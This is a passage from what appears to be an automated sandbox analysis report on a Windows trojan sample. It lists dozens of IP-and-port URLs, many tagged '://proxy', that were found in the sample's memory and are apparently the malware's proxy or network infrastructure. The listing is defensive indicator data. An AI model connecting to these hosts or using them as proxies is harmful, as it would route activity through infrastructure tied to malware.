                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.220.1:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.239.30.1:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.239.30.1:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.78.25:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.78.25:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.79.190:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.79.190:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C808B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.250.215.8:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.250.215.8:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.250.215.8:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.148.72:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.148.72:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.202.73:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.202.73:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6571000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.203.115:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.4.203.115:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.71.147:6745
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.71.147:6745://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.83.188:6471
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.83.188:6471://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.84.163:6788
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.43.84.163:6788://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.55.57.204:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.55.57.204:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.102.10:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.102.10:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4007
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4007://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.62.167.249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.62.167.249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.62.167.249:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1B6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.64.11.17:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.64.11.17:8080://proxy0k&
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.67.210.47:3389
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.67.210.47:3389://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.67.210.47:3389x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.177.10:52246
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.177.10:52246://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.210.195:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.210.195:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.210.203:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.210.203:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.201.50:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.201.50:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.236.121:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.236.121:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.236.194:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.236.194:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.237.146:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.237.146:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.15.136:9292
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.15.136:9292://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8173000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C817F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.73.0.118:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.73.0.118:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.76.15.12:11969
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.76.15.12:11969://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.76.215.43:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.76.215.43:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.191.205:55919
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.191.205:55919://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.197.129:81
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.197.129:81://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.42.194:1389
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.42.194:1389://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.179.247:1337
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.179.247:1337://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:27855
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:27855://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:53288
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:53288://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:54393
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:54393://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:59421
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:59421://proxyP
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:9165
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:9165://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.89.230.174:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.89.230.174:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.104.150:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.104.150:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.93.17.108:3133
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.93.17.108:3133://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.140:4890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.140:4890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.186:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.186:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.209.230:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.209.230:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.100.10.3:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.100.10.3:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.102.134:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C667B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.102.134:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.13.77
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.13.77://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.13.77:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.186.238
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.186.238://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.186.238:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.210.101:48684
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.210.101:48684://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.223.220:3124
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.223.220:3124://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.35.193:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC5F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.35.193:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.42.230:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.42.230:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.160.129.189:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.160.129.189:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.17.63.166:4154
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.17.63.166:4154://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC62E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.171.28.162:59311
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.171.28.162:59311://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:25295
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:25295://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.182.6.69:41041
